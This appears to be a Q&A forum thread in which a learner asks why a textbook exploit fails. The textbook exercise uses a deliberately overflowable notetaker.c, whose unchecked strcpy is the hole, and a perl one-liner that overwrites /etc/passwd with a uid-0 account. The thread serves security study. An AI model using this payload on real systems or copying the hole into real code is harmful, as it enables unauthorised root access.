# Issue with the Notetaker exploit

Tags: c, linux, unix

This problem deals with an exploit on page 155 of the book Hacking: The art of exploitation. Here, the Notetaker program is used to append an entry with root privileges onto the /etc/passwd file.
The code for Notetaker.c goes like this:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <data to add to %s>\n", prog_name, filename);
   exit(0);
}

void fatal(char *);            // a function for fatal errors
void *ec_malloc(unsigned int); // an errorchecked malloc() wrapper

int main(int argc, char *argv[]) {
   int userid, fd; // file descriptor
   char *buffer, *datafile;

   buffer = (char *) ec_malloc(100);
   datafile = (char *) ec_malloc(20);
   strcpy(datafile, "/var/notes");

   if(argc < 2)                // If there aren't commandline arguments
      usage(argv[0], datafile); // display usage message and exit

   strcpy(buffer, argv[1]);  // copy into buffer

   printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
   printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

 // Opening the file
   fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
   if(fd == -1)
      fatal("in main() while opening file");
   printf("[DEBUG] file descriptor is %d\n", fd);

   userid = getuid(); // get the real user ID

// Writing data
   if(write(fd, &userid, 4) == -1) // write user ID before note data
      fatal("in main() while writing userid to file");
   write(fd, "\n", 1); // terminate line

   if(write(fd, buffer, strlen(buffer)) == -1) // write note
      fatal("in main() while writing buffer to file");
   write(fd, "\n", 1); // terminate line

// Closing file
   if(close(fd) == -1)
      fatal("in main() while closing file");

   printf("Note has been saved.\n");
   free(buffer);
   free(datafile);
}
```

A soft link is created to /bin/bash thru /tmp/etc/passwd
"password" is given as a default password with salt XX--XXq2wKiyI43A2
And User ID is given as 0- to get root privileges.
The exploit goes as below:

```
$ ./notetaker $(perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 .
":/root:/tmp/etc/passwd"')
```

When I try this, all I get is  a fatal error while opening the file saying permission is denied.
It seems to work just fine in the book since $tail /etc/passwd shows the new entry thru this exploit which gives a root access.
Pls help.

Comment: On wich OS are you working? If this is a known exploit, any recent *nix OSes should have patched it, try in a VM with a old distribution. (There is a linux made to be exploited, I think the name is Damn Weak Linux or something like that)

Comment: I tried it on an ubuntu distribution that came with the live CD of the book. It is supposed to work there right?

Comment: https://stackoverflow.com/questions/2340259/how-to-turn-off-gcc-compiler-optimization-to-enable-buffer-overflow

Comment: Even if the ubuntu is provided with the book, there may be special configuration to make the exploit work, like activating or disabling some compiler options, or even in the OS. My guess would be to try with [Damn Vulnerable Linux)[http://en.wikipedia.org/wiki/Security-focused_operating_system#Damn_Vulnerable_Linux) and look in the book if some optimization of the compiler must be disabled.

Answer (score 0):

You need to read chapter two. It shows you changing the owner to root via chown and chmod u+s. page 93.